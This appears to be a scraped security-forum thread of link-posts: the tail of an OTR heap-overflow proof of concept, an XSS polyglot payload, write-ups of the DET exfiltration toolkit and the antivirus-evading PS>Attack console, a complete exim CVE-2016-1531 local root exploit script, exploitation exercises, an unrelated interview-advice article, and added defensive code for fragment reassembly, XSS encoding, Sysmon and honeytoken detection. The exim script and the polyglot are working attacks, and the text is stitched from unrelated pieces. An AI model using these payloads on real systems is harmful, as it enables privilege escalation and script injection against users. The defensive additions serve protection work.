logger.setLevel(logging.INFO) # change to DEBUG for higher verbosity if len(sys.argv) < 3: print u"Usage:" print "\t%s JID password ['tls_noverify'|cacert_file]" % (sys.argv[0],) print "example:" print "\t%s test@localhost verysecret" % (sys.argv[0],) sys.exit(1) print u"creating client..." c=Client(JID(sys.argv[1]), sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else None) print u"connecting..." c.connect() print u"looping..." try: # Component class provides basic "main loop" for the applitation # Though, most applications would need to have their own loop and call # component.stream.loop_iter() from it whenever an event on # component.stream.fileno() occurs. c.loop(1) except IOError, e: if e.errno == errno.EPIPE: # IGNORE EPIPE error print "PIPE ERROR -- IGNORING" else: pass except KeyboardInterrupt: print u"disconnecting..." c.disconnect() print u"exiting..." # vi: sts=4 et sw=4 Sursa: https://raw.githubusercontent.com/x41sec/advisories/master/X41-2016-001/otr-heap-overflow-poc.py
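The PoC above feeds the receiving client an initial block whose declared data length is 0xFFFFFFFF and then streams fragments totalling several gigabytes, relying on the reassembler to keep buffering. As an added example (not part of the X41 PoC or of libotr), here is a fragment reassembler with the bounds checks a hardened client needs: it parses the `?OTR,k,n,payload,` fragment syntax the PoC sends, rejects inconsistent k/n, and refuses the stream on the first fragment that would push the reassembled size past a cap. The 64 KiB cap and the `fragment()` helper used to build the test streams are assumptions for the demo.

```python
import re

# Fragment syntax as sent by the PoC above: "?OTR,k,n,payload,"
# (the PoC formats k and n with %hu, so five digits is the most they can carry)
_FRAG_RE = re.compile(r"^\?OTR,(\d{1,5}),(\d{1,5}),([^,]*),$")


class FragmentError(ValueError):
    """Raised when a fragment stream violates the reassembly rules."""


class BoundedReassembler:
    """Reassemble OTR fragments while enforcing a cap on the total size.

    max_total is an assumed policy value (64 KiB here), not a libotr constant.
    """

    def __init__(self, max_total=64 * 1024):
        self.max_total = max_total
        self.reset()

    def reset(self):
        self.expected_k = 1
        self.expected_n = None
        self.parts = []
        self.total = 0

    def feed(self, fragment):
        """Consume one fragment; return the reassembled message when k == n, else None."""
        m = _FRAG_RE.match(fragment)
        if not m:
            raise FragmentError("malformed fragment")
        k, n, payload = int(m.group(1)), int(m.group(2)), m.group(3)
        if k == 0 or n == 0 or k > n:
            raise FragmentError("bad fragment index %d/%d" % (k, n))
        if k == 1:
            self.reset()                # a first fragment starts a new message
            self.expected_n = n
        elif self.expected_n != n or k != self.expected_k:
            self.reset()
            raise FragmentError("out-of-order fragment %d/%d" % (k, n))
        # Check the cap before storing anything: a 20 MiB fragment like the
        # PoC's is refused on the first piece, not after gigabytes are buffered.
        if self.total + len(payload) > self.max_total:
            self.reset()
            raise FragmentError("reassembled size would exceed %d bytes" % self.max_total)
        self.parts.append(payload)
        self.total += len(payload)
        self.expected_k = k + 1
        if k == n:
            msg = "".join(self.parts)
            self.reset()
            return msg
        return None


def fragment(message, size):
    """Split a message into fragments the way a well-behaved sender does (demo helper)."""
    chunks = [message[i:i + size] for i in range(0, len(message), size)] or [""]
    n = len(chunks)
    return ["?OTR,%d,%d,%s," % (k, n, c) for k, c in enumerate(chunks, 1)]


def reassemble_all(fragments, max_total=64 * 1024):
    """Feed a fragment list; return ('ok', message), ('rejected', reason, index) or ('incomplete', None)."""
    r = BoundedReassembler(max_total)
    for i, f in enumerate(fragments, 1):
        try:
            out = r.feed(f)
        except FragmentError as e:
            return ("rejected", str(e), i)
        if out is not None:
            return ("ok", out)
    return ("incomplete", None)
```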
-
Yes, but there is also the advantage that if you, as an employee, don't like it, you take your toys and leave without any problems.
-
DET (extensible) Data Exfiltration Toolkit
DET (provided AS IS) is a proof of concept for performing Data Exfiltration using either a single channel or multiple channels at the same time. The idea was to create a generic toolkit into which any kind of protocol/service can be plugged.
Slides: DET was presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Soon.
Link: https://github.com/sensepost/DET
-
Unleashing an Ultimate XSS Polyglot
Ahmed Elsobky
Foreground: When it comes to testing for cross-site scripting vulnerabilities (a.k.a. XSS), you’re generally faced with a variety of injection contexts, each of which requires you to alter your injection payload so it suits the specific context at hand. This can be tedious and time consuming in most cases, but luckily, XSS polyglots can come in handy here to save a lot of time and effort.
What is an XSS polyglot? An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.
So, what polyglot did you come up with?
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Anatomy of the polyglot (in a nutshell):
jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
/*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
(/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis!
//%0D%0A%0D%0A//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
</stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence.
\x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element!!
Total length: 144 characters.
Link: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
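Each segment of the polyglot breaks out of one context (string literal, tag, URI scheme, header), so the defence is to encode or validate for the context the value is actually written into. As an added example (not from the article), here are Python context encoders and input checks for the contexts the anatomy above names, applied to the polyglot as a constructed test input; the http(s)-only scheme allow-list and the header policy are assumed policies, not part of the article.

```python
import html
import re
import urllib.parse

# The polyglot from the article above, embedded as a constructed test input (144 characters).
POLYGLOT = ("jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )"
            "//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>"
            "\\x3csVg/<sVg/oNloAd=alert()//>\\x3e")


def encode_for_html(s):
    """HTML body or quoted-attribute context: entity-encode & < > " and '.
    This defuses the </stYle/</titLe/... tag-breaker sequence and the <sVg element."""
    return html.escape(s, quote=True)


def encode_for_js_string(s):
    """JavaScript string-literal context: \\xHH / \\uHHHH-encode every character that is
    not ASCII alphanumeric. Quotes, backticks, backslashes, comment delimiters and the
    '</' that would end a <script> block all become inert escape sequences."""
    out = []
    for ch in s:
        if ord(ch) < 128 and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02X" % ord(ch))
        else:
            out.append("\\u%04X" % ord(ch))
    return "".join(out)


def is_safe_href(url):
    """URL context (href/src): allow only http(s) absolute URLs and scheme-less relative
    URLs (assumed policy). Control characters and whitespace are stripped and the scheme
    is lower-cased before comparing, so the mixed-case 'jaVasCript:' gets no free pass."""
    cleaned = "".join(ch for ch in url if ord(ch) > 0x20 and ord(ch) != 0x7F)
    if cleaned.lower().startswith(("http://", "https://")):
        return True
    head = re.split(r"[/?#]", cleaned, maxsplit=1)[0]   # text before the first / ? or #
    return ":" not in head                               # any scheme at all is refused


def is_safe_header_value(value):
    """HTTP response-header context: the //%0D%0A%0D%0A// segment only bites when a
    URL-decoded value is copied into a header, so refuse CR/LF after decoding."""
    decoded = urllib.parse.unquote(value)
    return "\r" not in decoded and "\n" not in decoded


def neutralise(payload):
    """Apply each context's encoder or check to one payload and report the outcome."""
    return {
        "html": encode_for_html(payload),
        "js_string": encode_for_js_string(payload),
        "href_allowed": is_safe_href(payload),
        "header_allowed": is_safe_header_value(payload),
    }
```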
-
-
-
Introducing PS>Attack
I’ve been a huge PowerShell fan ever since I first discovered it as a Systems Administrator many years ago. It’s an incredibly easy to use, intuitive and powerful language and helped me efficiently address a lot of tasks that came across my plate. Unfortunately, the other Systems Administrators that I worked with were less keen to pick it up. Years of pointing and clicking had made them nervous about using a command line. For different reasons, the Information Security community is in a similar state. PowerShell is an incredible platform for both offense and defense. There is a lot of cutting edge work being done by members of the PowerShell community, but the Information Security community at large is unaware of a lot of their contributions. This may stem from a lack of interest in Windows development or fear of having to learn yet another scripting language. No matter the reason, a lot of security professionals are missing out on some great work.
ENTER PS>ATTACK
To help make using offensive PowerShell easier, I’ve created PS>Attack. PS>Attack is a custom made console that is designed to emulate PowerShell and enhance it. Built into PS>Attack are over 110 offensive PowerShell commands representing some of the greatest work going on in the offensive PowerShell community. This selection of tools runs the entire gamut of a security assessment including Reconnaissance, Privilege Escalation, Backdoors and Data Exfiltration. It also includes a custom command called “get-attack” which helps to serve as an attack search engine. It takes a word or phrase and returns a list of commands and their descriptions that match what you’re looking for.
[Screenshot: Get-Attack returning a list of commands related to the word “Password”]
All of this is bundled into a single executable that runs on anything from a fresh install of Windows 7 all the way up to a fully patched version of Windows 10. There’s no installer, just double click and start attacking.
NOT JUST FOR THE LAB
In creating PS>Attack, I didn’t want to create a tool that was only used in a lab environment. I wanted to create something that was useful and could find its way into a penetration tester’s bag of tricks. To this end, PS>Attack is designed to evade antivirus and other hurdles. The various scripts and payloads that provide the commands are encrypted before being embedded into the executable. When PS>Attack is run, these scripts are decrypted directly into memory, so the plain text payloads never touch the hard drive. This helps avoid detection by most antivirus solutions. PS>Attack is also written using native .NET functions and objects to process PowerShell code; it does not rely on “powershell.exe”. Because .NET is such an important part of Windows, this means that it’s very difficult for an organization to prevent PS>Attack from accessing the functionality it needs to run.
GETTING PS>ATTACK
PS>Attack is available on our Github account. You can either compile the code yourself using Visual Studio or you can download pre-compiled binaries from the “releases” tab.
ACKNOWLEDGMENTS
PS>Attack relies on a lot of tools to make itself effective and it’s important to make sure that the authors of those tools get the attention they deserve. Scripts from the following tools and frameworks are incorporated into PS>Attack. These tools represent some of the best work being done in offensive PowerShell today: PowerSploit, Nishang, Inveigh, PowerCat
Jared Haight
Source: http://blog.gdssecurity.com/labs/2016/3/8/introducing-psattack.html
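Because PS>Attack hosts the PowerShell engine through .NET instead of launching powershell.exe, detections keyed on the process name never fire; what does remain visible is the engine assembly being mapped into an unexpected process. As an added example (not from the PS>Attack project or the post), here is detection logic over constructed Sysmon Event ID 7 (Image loaded) records in Sysmon's "Key: Value" message rendering: it flags any process outside an allow-list of known hosts that loads System.Management.Automation.dll. The sample records, paths, PIDs and the allow-list are assumptions for the demo.

```python
import ntpath

# Constructed Sysmon Event ID 7 (Image loaded) messages. Paths, PIDs, users and the
# unsigned host binary are sample values, not real telemetry.
SAMPLE_EVENTS = [
    "Image loaded:\n"
    "UtcTime: 2016-03-09 10:15:02.123\n"
    "ProcessId: 4120\n"
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
    "ImageLoaded: C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\System.Management.Automation.dll\n"
    "Signed: true\n"
    "User: CORP\\alice",
    "Image loaded:\n"
    "UtcTime: 2016-03-09 10:16:40.512\n"
    "ProcessId: 5208\n"
    "Image: C:\\Users\\bob\\Downloads\\tool.exe\n"
    "ImageLoaded: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management.Automation\\System.Management.Automation.ni.dll\n"
    "Signed: false\n"
    "User: CORP\\bob",
    "Image loaded:\n"
    "UtcTime: 2016-03-09 10:17:05.004\n"
    "ProcessId: 6012\n"
    "Image: C:\\Program Files\\Vendor\\app.exe\n"
    "ImageLoaded: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\System.dll\n"
    "Signed: true\n"
    "User: CORP\\carol",
    "Image loaded:\n"
    "UtcTime: 2016-03-09 10:18:22.777\n"
    "ProcessId: 6200\n"
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\n"
    "ImageLoaded: C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\System.Management.Automation.dll\n"
    "Signed: true\n"
    "User: CORP\\alice",
]

# The PowerShell engine assembly (IL and native-image forms).
POWERSHELL_ENGINE = {"system.management.automation.dll", "system.management.automation.ni.dll"}
# Hosts expected to load the engine; extend after baselining your own environment (assumed list).
EXPECTED_HOSTS = {"powershell.exe", "powershell_ise.exe"}


def parse_sysmon_message(text):
    """Turn Sysmon's 'Key: Value' message lines into a dict; the title line carries no value."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_unexpected_powershell_host(fields):
    """True when a process outside EXPECTED_HOSTS maps the PowerShell engine assembly.
    The match is on the loaded DLL, so renaming the host binary does not evade it."""
    loaded = ntpath.basename(fields.get("ImageLoaded", "")).lower()
    host = ntpath.basename(fields.get("Image", "")).lower()
    return loaded in POWERSHELL_ENGINE and host not in EXPECTED_HOSTS


def find_unexpected_hosts(messages):
    """Run the check over rendered event messages; return (Image, ProcessId, User, Signed) per hit."""
    hits = []
    for msg in messages:
        f = parse_sysmon_message(msg)
        if f.get("ImageLoaded") and is_unexpected_powershell_host(f):
            hits.append((f.get("Image"), f.get("ProcessId"), f.get("User"), f.get("Signed")))
    return hits
```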
-
How to pass a programming interview by Ammon Bartram This post started as the preparation material we send to our candidates, but we decided to post it publicly. Being a good programmer has a surprisingly small role in passing programming interviews. To be a productive programmer, you need to be able to solve large, sprawling problems over weeks and months. Each question in an interview, in contrast, lasts less than one hour. To do well in an interview, then, you need to be able to solve small problems quickly, under duress, while explaining your thoughts clearly. This is a different skill [1]. On top of this, interviewers are often poorly trained and inattentive (they would rather be programming), and ask questions far removed from actual work. They bring bias, pattern matching, and a lack of standardization. Running Triplebyte, I see this clearly. We interview engineers without looking at resumes, and fast-track them to on-sites at YC companies. We’ve interviewed over 1000 programmers in the last nine months. We focus heavily on practical programming, and let candidates pick one of several ways to be evaluated. This means we work with many (very talented) programmers without formal CS training. Many of these people do poorly on interviews. They eat large sprawling problems for breakfast, but they balk at 45-min algorithm challenges. The good news is that interviewing is a skill that can be learned. We’ve had success teaching candidates to do better on interviews. Indeed, the quality that most correlates with a Triplebyte candidate passing interviews at YC companies is not raw talent, but rather diligence. I fundamentally do not believe that good programmers should have to learn special interviewing skills to do well on interviews. But the status quo is what it is. We’re working at Triplebyte to change this. If you’re interested in what we’re doing, we’d love you to check out our process. 
In the meantime, if you do want to get better at interviewing, this blog post describes how we think you can most effectively do so.
1. Be enthusiastic
Enthusiasm has a huge impact on interview results. About 50% of the Triplebyte candidates who fail interviews at companies fail for non-technical reasons. This is usually described by the company as a “poor culture fit”. Nine times out of ten, however, culture fit just means enthusiasm for what a company does. Companies want candidates who are excited about their mission. This carries as much weight at many companies as technical skill. This makes sense. Excited employees will be happier and work harder. The problem is that this can be faked. Some candidates manage to convince every company they talk to that it’s their dream job, while others (who are genuinely excited) fail to convince anyone. We’ve seen this again and again. The solution is for everyone to get better at showing their enthusiasm. This is not permission to lie. But interviewing is like dating. No one wants to be told on a first date that they are one option among many, even though this is usually the case. Similarly, most programmers just want a good job with a good paycheck. But stating this in an interview is a mistake. The best approach is to prepare notes before an interview about what you find exciting about the company, and bring this up with each interviewer when they ask if you have any questions. A good source of ideas is to read the company’s recent blog posts and press releases and note the ones you find exciting. This idea seems facile. I imagine you are nodding along as you read this. But (as anyone who has ever interviewed can tell you) a surprisingly small percentage of applicants do this. Carefully preparing notes on why you find a company exciting really will increase your pass rate. You can even reference the notes during the interview. Bringing prepared notes shows preparation.
2. Study common interview concepts
A large percentage of interview questions feature data structures and algorithms. For better or worse, this is the truth. We gather question details from our candidates who interview at YC companies (we’ll be doing an in-depth analysis of this data in a future article), and algorithm questions make up over 70% of the questions that are asked. You do not need to be an expert, but knowing the following list of algorithms and data structures will help at most companies.
Hash tables
Linked lists
Breadth-first search, depth-first search
Quicksort, merge sort
Binary search
2D arrays
Dynamic arrays
Binary search trees
Dynamic programming
Big-O analysis
Depending on your background, this list may look trivial, or may look totally intimidating. That’s exactly the point. These are concepts that are far more common in interviews than they are in production web programming. If you’re self-taught or years out of school and these concepts are not familiar to you, you will do better in interviews if you study them. Even if you do know these things, refreshing your knowledge will help. A startlingly high percentage of interview questions reduce to breadth-first search or the use of a hash table to count uniques. You need to be able to write a BFS cold, and you need to understand how a hash table is implemented. Learning these things is not as hard as many of the people we talk to fear. Algorithms are usually described in academic language, and this can be off-putting. But at its core, nothing on this list is more complicated than the architecture of a modern web app. If you can build a web app (well), you can learn these things. The resource that I recommend is the book The Algorithm Design Manual by Steven Skiena. Chapters 3 through 5 do a great job of going over this material, in a straightforward way. It does use C and some math syntax, but it explains the material well. Coursera also has several good algorithms courses.
This one, in particular, focuses on the concepts that are important in interviews. Studying algorithms and data structures helps not only because the material comes up in interviews, but also because the approach to problems taken in an algorithm course is the same approach that works best in interviews. Studying algorithms will get you in an interview mindset.
3. Get help from your interviewer
Interviewers help candidates. They give hints, they respond to ideas, and they generally guide the process. But they don’t help all candidates equally. Some programmers are able to extract significant help, without the interviewer holding it against them. Others are judged harshly for any hints they are given. You want to be helped. This comes down to process and communication. If the interviewer likes your process and you communicate well with them, they will not mind helping. You can make this more likely by following a careful process. The steps I recommend are:
Ask questions
Talk through a brute-force solution
Talk through an optimized solution
Write code
After you are asked an interview question, start by clarifying what was asked. This is the time to be pedantic. Clarify every ambiguity you can think of. Ask about edge cases. Bring up specific examples of input, and make sure you are correct about the expected output. Ask questions even if you’re almost sure you know the answers. This is useful because it gives you a chance to come up with edge cases and fully spec the problem (seeing how you handle edge-cases is one of the main things that interviewers look for when evaluating an interview), and also because it gives you a minute to collect your thoughts before you need to start solving the problem. Next, you should talk through the simplest brute-force solution to the problem that you can think of. You should talk, rather than jump right into coding, because you can move faster when talking, and it’s more engaging for the interviewer. If the interviewer is engaged, they will step in and offer pointers. If you retreat into writing code, however, you'll miss this opportunity. Candidates often skip the brute-force step, assuming that the brute-force solution to the problem is too obvious, or wrong. This is a mistake. Make sure that you always give a solution to the problem you’ve been asked (even if it takes exponential time, or an NSA super computer). When you’ve described a brute-force solution, ask the interviewer if they would like you to implement it, or come up with a more efficient solution. Normally they will tell you to come up with a more efficient solution. The process for the more efficient solution is the same as for the brute force. Again talk, don’t write code, and bounce ideas off of the interviewer. Hopefully, the question will be similar to something you’ve seen, and you’ll know the answer. If that is not the case, it’s useful to think of what problems you’ve seen that are most similar, and bring these up with the interviewer. Most interview questions are slightly-obscured applications of classic CS algorithms. The interviewer will often guide you to this algorithm, but only if you begin the process. Finally, after both you and your interviewer agree that you have a good solution, you should write your code. Depending on the company, this may be on a computer or a whiteboard. But because you’ve already come up with the solution, this should be fairly straightforward. For extra points, ask your interviewer if they would like you to write tests.
4. Talk about trade-offs
Programming interviews are primarily made up of programming questions, and that is what I have talked about so far. However, you may also encounter system design questions. Companies seem to like these especially for more experienced candidates. In a system design question, the candidate is asked how he or she would design a complex real-world system.
Examples include designing Google maps, designing a social network, or designing an API for a bank. The first observation is that answering system design questions requires some specific knowledge. Obviously no one actually expects you to design Google maps (that took a lot of people a long time). But they do expect you to have some insight into aspects of such a design. The good news is that these questions usually focus on web backends, so you can make a lot of progress by reading about this area. An incomplete list of things to understand is:
HTTP (at the protocol level)
Databases (indexes, query planning)
CDNs
Caching (LRU cache, memcached, redis)
Load balancers
Distributed worker systems
You need to understand these concepts. But more importantly, you need to understand how they fit together to form real systems. The best way to learn this is to read about how other engineers have used the concepts. The blog High Scalability is a great resource for this. It publishes detailed write-ups of the back-end architecture at real companies. You can read about how every concept on the list above is used in real systems. Once you’ve done this reading, answering system design questions is a matter of process. Start at the highest level, and move downward. At each level, ask your interviewer for specifications (should you suggest a simple starting point, or talk about what a mature system might look like?) and talk about several options (applying the ideas from your reading). Discussing tradeoffs in your design is key. Your interviewer cares less about whether your design is good in itself, and more about whether you are able to talk about the trade-offs (positives and negatives) of your decisions. Practice this.
5. Highlight results
The third type of question you may encounter is the experience question. This is where the interviewer asks you to talk about a programming project that you completed in the past.
The mistake that many engineers make on this question is to talk about a technically interesting side-project. Many programmers choose to talk about implementing a neural network classifier, or writing a Twitter grammar bot. These are bad choices because it’s very hard for the interviewer to judge their scope. Many candidates exaggerate simple side projects (sometimes ones that never actually worked), and the interviewer has no way to tell if you are doing this. The solution is to choose a project that produced results, and highlight the results. This often involves picking a less technically interesting project, but it’s worth it. Think (ahead of time) of the programming you’ve done that had the largest real-world impact. If you’ve written an iOS game, and 50k people have downloaded it, the download number makes it a good option. If you’ve written an admin interface during an internship that was deployed to the entire admin staff, the deployment makes it a good thing to talk about. Selecting a practical project will also communicate to the company that you focus on actual work. A programmer too focused on interesting tech is an anti-pattern that companies screen against (these programmers are sometimes not productive).
6. Use a dynamic language, but mention C
I recommend that you use a dynamic language like Python, Ruby or JavaScript during interviews. Of course, you should use whatever language you know best. But we find that many people try interviewing in C, C++ or Java, under the impression these are the “real” programming languages. Several classic books on interviewing recommend that programmers choose Java or C++. At startups at least, we’ve found that this is bad advice. Candidates do better when using dynamic languages. This is true, I think, because of dynamic languages’ compact syntax, flexible typing, and list and hash literals. They are permissive languages. This can be a liability when writing complex systems (a highly debatable point), but it’s great when trying to cram binary search onto a whiteboard. No matter what language you use, it’s helpful to mention work in other languages. An anti-pattern that companies screen against is people who only know one language. If you do only know one language, you have to rely on your strength in that language. But if you’ve done work or side-projects in multiple languages, be sure to bring this up when talking to your interviewers. If you have worked in lower-level languages like C, C++, Go, or Rust, talking about this will particularly help. Java, C# and PHP are a problematic case. As we described in our last blog post, we’ve uncovered bias against these languages in startups. We have data showing that programmers using these languages in the interview pass at a lower rate. This is not fair, but it is the truth. If you have other options, I recommend against using these languages in interviews with startups.
7. Practice, practice, practice
You can get much better at interviewing by practicing answering questions. This is true because interviews are stressful, but stress harms performance. The solution is practice. Interviewing becomes less stressful with exposure. This happens naturally with experience. Even within a single job search, we find that candidates often fail their initial interviews, and then pass more as their confidence builds. If stress is something you struggle with, I recommend that you jumpstart this process by practicing interview stress. Get a list of interview questions (the book Cracking the Coding Interview is one good source) and solve them. Set a 20-minute timer on each question, and race to answer. Practice writing the answers on a whiteboard (not all companies require this, but it’s the worst case, so you should practice it). A pen on paper is a pretty good simulation of a whiteboard. If you have friends who can help you prepare, taking turns interviewing each other is great. Reading a lot of interview questions has the added benefit of providing you ideas to use when in actual interviews. A surprising number of questions are re-used (in full or in part). Even experienced (and stress-free) candidates will benefit from this. Interviewing is a fundamentally different skill from working as a programmer, and it can atrophy. But experienced programmers often (reasonably) feel that they should not have to prepare for interviews. They study less. This is why junior candidates often actually do better on interview questions than experienced candidates. Companies know this, and, paradoxically, some tell us they set lower bars on the programming questions for experienced candidates.
8. Mention credentials
Credentials bias interviewers. Triplebyte candidates who have worked at a top company or studied at a top school go on to pass interviews at a 30% higher rate than programmers who don’t have these credentials (for a given level of performance on our credential-blind screen). I don’t like this. It’s not meritocratic and it sucks, but if you have these credentials, it’s in your interest to make sure that your interviewers know this. You can’t trust that they’ll read your resume.
9. Line up offers
If you’ve ever read fund-raising advice for founders, you’ll know that getting the 1st VC to make an investment offer is the hardest part. Once you have one offer, more come pouring in. The same is true of job offers. If you already have an offer, be sure to mention this in interviews. Mentioning other offers in an interview heavily biases the interviewer in your favor. This brings up the strategy of making a list of the companies you’re interested in, and setting up interviews in reverse order of interest. Doing well earlier in the process will increase your probability of getting an offer from your number one choice. You should do this.
Conclusion
Passing interviews is a skill. Being a great programmer helps, but it’s only part of the picture. Everyone fails some of their interviews, and preparing properly can help everyone pass more. Enthusiasm is paramount, and research helps with this. As many programmers fail for lacking enthusiasm as fail for technical reasons. Interviewers help candidates during interviews, and if you follow a good process and communicate clearly, they will help you. Practice always helps. Reading lots of interview questions and inuring yourself to interview stress will lead to more offers. This situation is not ideal. Preparing for interviews is work, and forcing programmers to learn skills other than building great software wastes everyone’s time. Companies should improve their interview processes to be less biased by academic CS, memorized facts, and rehearsed interview processes. This is what we’re doing at Triplebyte. We help programmers get jobs without looking at resumes. We let programmers pick one of several areas in which to be evaluated, and we study and improve our process over time. We’d love to help you get a job at a startup, without jumping through these hoops. You can get started here. But the status quo is what it is. Until this changes, programmers should know how to prepare. Thanks to Jared Friedman, Emmett Shear, Garry Tan, Alexis Ohanian and Daniel Gackle for reading drafts of this.
Source: http://blog.triplebyte.com/how-to-pass-a-programming-interview
-
Black Hat Europe 2015 https://www.youtube.com/playlist?list=PLH15HpR5qRsVd9jdTWUB5s16fmr2VCQyS
-
Data Extraction via String Concatenation in a Blind SQL Injection Vulnerability
March 7, 2016 Posted By Carlos Muñoz
Day One: In Which The Heavens Part, But Only Slightly
A few weeks ago while performing a web application test for $CLIENT, I happened to run into search functionality. As one of the very first standard tests I inserted a single quote ' into the search field and clicked the search button. The SQL error message that was returned was the stuff dreams are made of (i.e. a lot of info, slightly vague, not everything there, but enough in that moment to make you really, really believe). After a few quick tests to see if anything easy could be obtained (nope, no such luck), and confirming that I wouldn't be negatively impacting $CLIENT's systems if I did so, I turned it over to automated tools and went about testing other parts of the application. Time passed, and a few other issues were discovered and documented (it doesn't exist if no one else can reproduce it from your official description), and I went back to view the progress of automated tools, eager to see the keys to the kingdom laid down before me. Nothing. Okay, maybe I made a mistake or two setting the automated tools up? Investigations disproved that line of thinking, as the recorded request/response pairs showed the attacks were being properly sent with all the appropriate data. It is probably my imagination, but I think I can hear $CLIENT's webapp laughing at me. Hmmmm . . . this may be a bit more complex than I had hoped.
Full article: https://www.trustwave.com/Resources/SpiderLabs-Blog/Data-Extraction-via-String-Concatenation-in-a-Blind-SQL-Injection-Vulnerability/
-
-
-
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" argument -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

Source: https://github.com/HackerFantastic/Public/blob/master/exploits/cve-2016-1531.sh
-
Exercises for learning Reverse Engineering and Exploitation
All binaries for these challenges are ELF 64-bit LSB executable, x86-64.
reverse engineering
The goal is to run the challenges like this: ./rX password, and have them print out "password OK". It's reverse engineering, not cracking, so don't patch the binaries if you want to play by the rules. It gets really boring if you don't anyway.
sploit
All the sploit exercises are designed to be solvable with NX+ASLR without being dependent on which libc is used. The idea is that you should only interact with stdin / stdout as if it were a remote service; argv & env are not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun!
Source: https://github.com/wapiflapi/exrs
-
DCEPT

DCEPT (Domain Controller Enticing Password Tripwire) is a honeytoken-based tripwire for Microsoft's Active Directory. Honeytokens are pieces of information intentionally littered on a system so they can be discovered by an intruder. In the case of DCEPT, the honeytokens are credentials that would only be known by someone extracting them from memory. A logon attempt using these faux credentials would mean someone was inside the network and is attempting privilege escalation to domain administrator.

This proof of concept is being released as open source to benefit Windows system administrators. The goal of this project was to provide a free, simple, honeytoken deployment tool as well as educate administrators about the nature of these attacks. We encourage contributors to build on what we have done and welcome feedback. Has DCEPT helped your organization spot an intrusion before it was too late? We would like to hear from you.

More information about this research project can be found here: https://www.secureworks.com/blog/dcept

Download: https://github.com/secureworks/dcept
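The detection side of the idea above, as an added example that is not part of the DCEPT project: it scans constructed domain-controller logon events for any use of a planted honeytoken account and attributes the alert to the endpoint where that credential was seeded. The simplified log format, the account names and the one-honeytoken-per-host mapping are assumptions for this example.

```python
"""Honeytoken logon detection in the spirit of DCEPT (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Assumption: each endpoint was seeded with its own honeytoken account name,
# so a logon with that name reveals which machine's memory was harvested.
HONEYTOKENS: Dict[str, str] = {
    "svc_backup_ws01": "WS01",
    "svc_backup_ws02": "WS02",
}

# Constructed sample lines: a simplified key=value rendering of Security
# events 4624 (successful logon) and 4625 (failed logon) from a DC.
SAMPLE_LOG = """\
EventID=4624 TargetUserName=alice IpAddress=10.0.0.15 WorkstationName=WS03
EventID=4625 TargetUserName=svc_backup_ws02 IpAddress=10.0.0.99 WorkstationName=UNKNOWN
EventID=4624 TargetUserName=svc_backup_ws02 IpAddress=10.0.0.99 WorkstationName=UNKNOWN
EventID=4625 TargetUserName=bob IpAddress=10.0.0.20 WorkstationName=WS04
EventID=4624 TargetUserName=SVC_BACKUP_WS01 IpAddress=10.0.0.99 WorkstationName=UNKNOWN
"""

LINE_RE = re.compile(
    r"EventID=(?P<event>\d+)\s+TargetUserName=(?P<user>\S+)\s+"
    r"IpAddress=(?P<ip>\S+)\s+WorkstationName=(?P<ws>\S+)"
)


@dataclass(frozen=True)
class Alert:
    honeytoken: str   # account name that was used (normalised to lower case)
    planted_on: str   # endpoint the credential was seeded on
    source_ip: str    # where the logon attempt came from
    source_host: str
    outcome: str      # "success" or "failure": both are alerts, the account is never legitimately used


def detect_honeytoken_logons(log_text: str, honeytokens: Dict[str, str] = HONEYTOKENS) -> List[Alert]:
    """Return one Alert per logon event (success or failure) that names a honeytoken account."""
    tokens = {name.lower(): host for name, host in honeytokens.items()}
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines not in the expected format
        user = m.group("user").lower()  # Windows account names are case-insensitive
        if user not in tokens:
            continue
        outcome = "success" if m.group("event") == "4624" else "failure"
        alerts.append(Alert(user, tokens[user], m.group("ip"), m.group("ws"), outcome))
    return alerts


def compromised_endpoints(alerts: List[Alert]) -> List[str]:
    """Endpoints whose seeded credential has been used: where to start the investigation."""
    return sorted({a.planted_on for a in alerts})


if __name__ == "__main__":
    found = detect_honeytoken_logons(SAMPLE_LOG)
    for a in found:
        print(f"ALERT {a.honeytoken} (seeded on {a.planted_on}) used from {a.source_ip}/{a.source_host}: {a.outcome}")
    print("investigate first:", compromised_endpoints(found))
```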
-
